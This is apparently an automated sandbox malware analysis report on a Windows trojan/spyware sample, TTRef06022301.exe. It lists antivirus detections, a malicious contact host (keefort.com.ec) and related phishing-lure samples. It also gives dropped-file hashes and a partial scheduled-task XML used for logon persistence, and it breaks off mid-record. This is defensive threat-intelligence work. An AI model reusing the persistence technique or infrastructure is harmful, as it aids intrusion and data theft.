                  20.2.iJyzakGsXF.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1244301
                  No Antivirus matches
Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://keefort.com.ec | 0% | Avira URL Cloud | safe
http://mail.keefort.com.ec | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
keefort.com.ec | 88.99.90.21 | true | true | | unknown
api4.ipify.org | 104.237.62.211 | true | false | | high
api.ipify.org | unknown | unknown | false | | high
mail.keefort.com.ec | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://keefort.com.ec | TTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://fontfabrik.com | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | TTRef06022301.exe, 00000000.00000002.273699340.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002551000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002743000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.keefort.com.ec | TTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
88.99.90.21 | keefort.com.ec | Germany | 24940 | HETZNER-ASDE | true
104.237.62.211 | api4.ipify.org | United States | 18450 | WEBNXUS | false
173.231.16.76 | unknown | United States | 18450 | WEBNXUS | false

Private IP: 192.168.2.1
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 803161
Start date and time: 2023-02-09 19:39:13 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: TTRef06022301.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@20/11@8/4
                                                    EGA Information:
                                                    • Successful, ratio: 100%
HDC Information: Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 39
                                                    • Number of non-executed functions: 3
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed; report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:40:11 | API Interceptor | 8x Sleep call for process: TTRef06022301.exe modified
19:40:16 | Task Scheduler | Run new task: iJyzakGsXF path: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
19:40:16 | API Interceptor | 64x Sleep call for process: powershell.exe modified
19:40:35 | API Interceptor | 4x Sleep call for process: iJyzakGsXF.exe modified
Match | Associated Sample Name / URL | Detection
IP match 88.99.90.21 (all associated samples detected as malicious):
• TTreff2092023.exe
• DHL 1 x 20' LY 0736449574 Shipment 0106245448.exe
• CV.exe
• CV.exe
• TTRe01302023.exe
• ttref01312023.exe
• TTRef01269764.exe
• 333rrrr333333Done.vbs
• rtf.exe
• Orden de compra #PO06709.vbs
• SecuriteInfo.com.Trojan.Win32.Sonbokli.Acl.48.exe
• 2.exe
• SecuriteInfo.com.generic.ml.21828.exe
• Comprobante de Pago.doc
• Comprobante de Pago.doc
• Comprobante de Pago.doc
• Hesap Bildirimi.xls
• Hesap Bildirimi.xls
• Hesap Bildirimi.xls
• Comprobante de Pago.doc
IP match 104.237.62.211 (all associated samples detected as malicious):
• Offer Inquiry.exe
• Invoice.exe
• TTreff2092023.exe
• oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbs
• SUC9Vfrbc5.rtf
• TT copy.exe
• R18bNCrdBQbK14j.exe
• Solicitud de oferta ElectroStocks Salamanca ESPA#U00d1A N#U00ba 2100176 02092023.vbs
• SOA.exe
• RFQ 213.docx.doc
• New Order.exe
• Order Inquiry Feb 2023.exe
• Order Inquiry Feb 2023.exe
• DHL ORIGINAL DOCUMENTS.exe
• justificante de transferencia.vbs
• REQUEST FOR QUOTATION.exe
• fedex invoice ISP4PgzBmVS7wvC.exe
• New Order.exe
• e-dekont-20230208-.exe
• PAYMENT SLIP_002_JPEG.exe
Match | Associated Sample Name / URL | Detection | Context
Domain match api4.ipify.org (all associated samples detected as malicious; context IP in parentheses):
• SC0923881DB001.exe (173.231.16.76)
• invocie.exe (64.185.227.155)
• Offer Inquiry.exe (104.237.62.211)
• Invoice.exe (104.237.62.211)
• TTreff2092023.exe (104.237.62.211)
• Offer inquiry.exe (64.185.227.155)
• Curriculum Helton Admir CV.exe (64.185.227.155)
• ca865bb9-e407-4bc5-9409-65b3b1d9d236.exe (173.231.16.76)
• oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbs (104.237.62.211)
• Rechnung_pdf.vbs (173.231.16.76)
• qGo0EEaOai.exe (64.185.227.155)
• SUC9Vfrbc5.rtf (64.185.227.155)
• TT copy.exe (104.237.62.211)
• R18bNCrdBQbK14j.exe (104.237.62.211)
• Invoice.exe (64.185.227.155)
• Articoli richiesti.vbs (64.185.227.155)
• Shipping Document.exe (64.185.227.155)
• Solicitud de oferta ElectroStocks Salamanca ESPA#U00d1A N#U00ba 2100176 02092023.vbs (104.237.62.211)
• SOA.exe (104.237.62.211)
• RFQ 213.docx.doc (104.237.62.211)
Domain match keefort.com.ec (all associated samples detected as malicious; context IP in parentheses):
• 333rrrr333333Done.vbs (88.99.90.21)
• rtf.exe (88.99.90.21)
Match | Associated Sample Name / URL | Detection | Context
ASN match WEBNXUS (all associated samples detected as malicious; context IP in parentheses):
• SC0923881DB001.exe (173.231.16.76)
• invocie.exe (64.185.227.155)
• Offer Inquiry.exe (104.237.62.211)
• Invoice.exe (104.237.62.211)
• TTreff2092023.exe (64.185.227.155)
• Offer inquiry.exe (173.231.16.76)
• Curriculum Helton Admir CV.exe (64.185.227.155)
• ca865bb9-e407-4bc5-9409-65b3b1d9d236.exe (173.231.16.76)
• oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbs (104.237.62.211)
• Rechnung_pdf.vbs (173.231.16.76)
• qGo0EEaOai.exe (173.231.16.76)
                                                                                                                                    SUC9Vfrbc5.rtfGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    TT copy.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    R18bNCrdBQbK14j.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Articoli richiesti.vbsGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Shipping Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    Solicitud de oferta ElectroStocks Salamanca ESPA#U00d1A N#U00ba 2100176 02092023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    SOA.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    RFQ 213.docx.docGet hashmaliciousBrowse
                                                                                                                                    • 64.185.227.155
                                                                                                                                    HETZNER-ASDETTreff2092023.exeGet hashmaliciousBrowse
                                                                                                                                    • 88.99.90.21
                                                                                                                                    SecureMessageAtt.htmlGet hashmaliciousBrowse
                                                                                                                                    • 95.217.36.56
                                                                                                                                    SoLOfA6ezK.exeGet hashmaliciousBrowse
                                                                                                                                    • 116.203.231.217
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 148.251.234.93
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 148.251.234.93
                                                                                                                                    Shipping Document.exeGet hashmaliciousBrowse
                                                                                                                                    • 46.4.214.202
                                                                                                                                    SecureMessageAtt.htmlGet hashmaliciousBrowse
                                                                                                                                    • 95.217.36.56
                                                                                                                                    cnf13429226.vbsGet hashmaliciousBrowse
                                                                                                                                    • 94.130.164.100
                                                                                                                                    https://validacija-lozinke-administratora-servera-eu-68x.s3.us-west-004.backblazeb2.com/index.html#enela@tzs.baGet hashmaliciousBrowse
                                                                                                                                    • 46.4.252.224
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 148.251.234.93
                                                                                                                                    Order Inquiry Feb 2023.exeGet hashmaliciousBrowse
                                                                                                                                    • 46.4.214.202
                                                                                                                                    Order Inquiry Feb 2023.exeGet hashmaliciousBrowse
                                                                                                                                    • 46.4.214.202
                                                                                                                                    DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                    • 144.76.136.153
                                                                                                                                    DHL Original Documents.exeGet hashmaliciousBrowse
                                                                                                                                    • 144.76.136.153
                                                                                                                                    prog.apkGet hashmaliciousBrowse
                                                                                                                                    • 144.76.58.8
                                                                                                                                    Payment Advice Note from 09.02.2023#U25b6#Ufe0f#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                                                                                                                    • 78.46.190.171
                                                                                                                                    TBRpAD2HYJ.exeGet hashmaliciousBrowse
                                                                                                                                    • 95.217.14.200
                                                                                                                                    Wv5Lg653LX.elfGet hashmaliciousBrowse
                                                                                                                                    • 49.13.202.235
                                                                                                                                    i1lq1Qpbyw.exeGet hashmaliciousBrowse
                                                                                                                                    • 116.203.195.42
                                                                                                                                    Contract_2210-Feb-06-23.oneGet hashmaliciousBrowse
                                                                                                                                    • 144.76.136.153
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    SC0923881DB001.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    tPXWmHdD0L.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    invocie.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Jubilee Association of Maryland Doc.htmlGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    pixel.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    pixel.dllGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Offer Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Invoice.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    TTreff2092023.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Offer inquiry.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    TR7635 NX202302.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Curriculum Helton Admir CV.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Order Ref PO-NZL_25100137.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    ca865bb9-e407-4bc5-9409-65b3b1d9d236.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    oferta urgente GARMON ENERGIAS, S.L. 02.09.2023.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    Rechnung_pdf.vbsGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    PO-MW-17-02-002S.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    qGo0EEaOai.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
                                                                                                                                    TT copy.exeGet hashmaliciousBrowse
                                                                                                                                    • 104.237.62.211
                                                                                                                                    • 173.231.16.76
No context

Process: C:\Users\user\Desktop\TTRef06022301.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1302
Entropy (8bit): 5.3499841584777394
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84bE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: 4664C2114894A4BFC1E657FC08C72FF4
SHA1: 95A1E14E2AD65BCA561261DA3899074BF5276AED
SHA-256: 6E36229D13672B4304C696812B365F2E5657875DD0E11F13AE010566CC87607A
SHA-512: 4E7862716D5C0BC2174E819BAB329A2974FE83A36D5417EE732AB2F3D77D95620B3D462A1C9608F5FE90A48030140DE53DB642F8C370CD8E191BDBE83C638CA1
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Process: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 21748
Entropy (8bit): 5.598068395793424
Encrypted: false
SSDEEP: 384:JtCRLq0yg5TPwIW0H13n3ISjnyjulrIt+iJ9glSJ3uyV1Fm0ZaAVrdts/GA+inY8:XwPwIWkdYoyClrSulcuGnJ8
MD5: D084CC0D0513FE4671BEA3A4D3C20151
SHA1: 64EC8309103AD771BDA7488E71ADFDAD0D4ED854
SHA-256: 4AE2F910F0241FD12D1D54052DD9F04E72ECC1B93A4C42DCDAB9B568152D4BF2
SHA-512: 3E2FCA1CF87867EFA356AB583BE7742C21FE5F2E60F60CE5BA753B164EC1C2FB531BC0F66CEB0839E6C6343A191F21919DC6806A2A92CAE403FFF8F7825222AD
Malicious: false

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1613
                                                                                                                                    Entropy (8bit):5.1408766910366035
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2di4+S2qh/dp1Kd+y1modHUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt1xvn:cgeHMYrFdOFzOzN33ODOiDdKrsuTLv
                                                                                                                                    MD5:9298D68607CC78CBFBF5356B3450ED49
                                                                                                                                    SHA1:6200BDAAF56F69E4055870CEECEB4E5A1AADC9D5
                                                                                                                                    SHA-256:CF4BB042E675BEA6636BC47B7BBE07E52440CBB1EE35E72D062D15EFB1B21230
                                                                                                                                    SHA-512:74E2E33D1B3E032FEF3BBCFD20CEC50F932A6A88373CCEB9AFAFA4EDB8FB12C2847E3A41DCDB98DA3A1139FD08DC36B415A6810966452B19C3B1E04B793B39F5
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvai
                                                                                                                                    Process:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1613
                                                                                                                                    Entropy (8bit):5.1408766910366035
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2di4+S2qh/dp1Kd+y1modHUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt1xvn:cgeHMYrFdOFzOzN33ODOiDdKrsuTLv
                                                                                                                                    MD5:9298D68607CC78CBFBF5356B3450ED49
                                                                                                                                    SHA1:6200BDAAF56F69E4055870CEECEB4E5A1AADC9D5
                                                                                                                                    SHA-256:CF4BB042E675BEA6636BC47B7BBE07E52440CBB1EE35E72D062D15EFB1B21230
                                                                                                                                    SHA-512:74E2E33D1B3E032FEF3BBCFD20CEC50F932A6A88373CCEB9AFAFA4EDB8FB12C2847E3A41DCDB98DA3A1139FD08DC36B415A6810966452B19C3B1E04B793B39F5
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvai
                                                                                                                                    Process:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):791552
                                                                                                                                    Entropy (8bit):7.972515156065869
                                                                                                                                    Encrypted:false
